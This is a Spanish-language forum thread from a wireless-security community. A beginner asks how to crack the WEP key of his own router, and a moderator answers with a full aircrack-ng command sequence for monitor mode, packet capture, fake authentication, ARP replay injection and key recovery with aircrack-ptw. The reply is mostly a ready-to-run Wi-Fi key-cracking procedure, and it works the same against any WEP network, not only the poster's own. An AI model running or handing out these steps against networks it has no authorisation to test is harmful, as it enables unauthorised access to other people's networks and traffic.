Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación?
07-Octubre 16:51:48 (Martes)
Inicio Ayuda Ingresar Registrarse

+  Seguridad Wireless
|-+  Suite Seguridad Wireless
| |-+  Live CD Wifislax
| | |-+  Live CD Wifislax (versión reducida) (Moderadores: ChimoC, the_often, chinitiw)
| | | |-+  Mis primeros pasos
Páginas: 1 Imprimir
Autor Tema: Mis primeros pasos  (Leído 1056 veces)
arturito109
*
Desconectado Desconectado

« en: 24-Enero 12:55:59 (Jueves) »

Para empezar deciros que he probado la versión "normal" y no tengo forma de que me funcione el USB C54RU y en la versión reducida parace que si.
Tambien deciros que soy super novato en esto y cuando más leo más lio me hago, así que os digo lo que he hecho (que es muy poco) a ver si me podeis orientar un poquito.

OBJETIVOS
Crakear la clave WEP de 128 bts de mi router y luego intentar hacerlo con una WAP que previamente cambiaría.

HARDWARE

CONCENTRONIC C54RU (RF2571F)
ROUTER WIFI XAVI 7768r
P IV a 2,4 y 256 MB de RAM que tengo para estos menesteres

SOFTWARE

WIFISLAX 3.1 en versión reducida

PRIMEROS PASOS:

- Me he descargado el wifislax 3.1 versión reducida y lo he grabado en un CD para poder arrancar con él. (Hasta aquí sin problemas, jaja)

- Arranco el equipo dede el CD como "wififlax Graphics mode (KDE)"

- Entro como root en la sesión que me sale por defecto.

- "Monto" el USB , para lo cual utilizo la opción "forzar ralink rt73 sobre rt 2570" que hay dentro de asistencia chipset (he observado que el chipset de mi USB es 2571F en lugar de 2570)

- Despues de montarlo puedo abrir AIRODUMP - NG y otras aplicaciones y me reconoce el dispositivo USB cosa que no lo lograba con el versión "normal"

Bueno supongo que para vosotros esto no es nada, pero a mi me ha costado mis horitas (no tengo ni idea de esto), pero ahora no se que pasos seguir.

¿Seriais tan amables de orientarme un poco?
ChimoC
Moderador Global

« Respuesta #1 en: 24-Enero 15:26:15 (Jueves) »

Buenas:

Ahora haces lo siguiente:

Abres una shell

iwconfig (te saldrá como rausb0)

ifconfig rausb0 up  (le das al intro)

iwconfig rausb0 rate 1M (le das al intro)

airmon-ng start rausb0 (le das al intro)

airodump-ng rausb0 (miras cual es tu red y lo paras con control + c)

airodump-ng -w arturo --bssid EL_BSSID -c EL_CANAL rausb0 (le das al intro)

En otra shell (A1)

aireplay-ng -1 10 -e EL_ESSID -a EL_BSSID -h TU_MAC rausb0 (le das al intro)

En otra shell (A3)

Opción A1 + A3 = aireplay-ng -3 -b EL_BSSID -h TU_MAC -x 1024 rausb0 (le das al intro)
Opción A3 puro=  aireplay-ng -3 -b EL_BSSID -h STATION_CONECTADA -x 1024 rausb0 (le das al intro)

En otra shell cuando veas que hay unos 60.000 datas en el airodump (columna DATA y tambien veas muchos ARPs en el A3)

aircrack-ptw arturo-01.cap (le das al intro)

Si tienes en casa 2 ordenadores (o una pda)... pon uno a navegar en internet y con el otro haces los pasos que te he dicho a excepción del A1 y con la opción A3 (puro).

Si solo tienes 1 ordenador ... haces los pasos de A1 más el A3 que te he indicado en la opción que pone A1+A3

Cuando lances el aircrack no hace falta que pares ni el airodump ni ninguno de los aireplays.... imagina que no te da la clave con los 60.000.... pues vuelves a lanzar el aircrack-ptw con 70.000 .... y así sucesivamente

Un saludo

ChimoC

P.D.: Y por favor, la próxima vez un Título de Post que describa tu problema... porque al verlo pensé que anunciabas algo de bebés  Grin
« Última modificación: 24-Enero 15:29:03 (Jueves) por ChimoC » En línea
arturito109
*

« Respuesta #2 en: 24-Enero 17:32:23 (Jueves) »

Gracias chimoc por tu respuesta. Intetaré seguir los pasos que me indicas pero no se si seré capaz de lograrlo. ya os comentaré.
Páginas: 1 Imprimir 
« anterior próximo »
Ir a: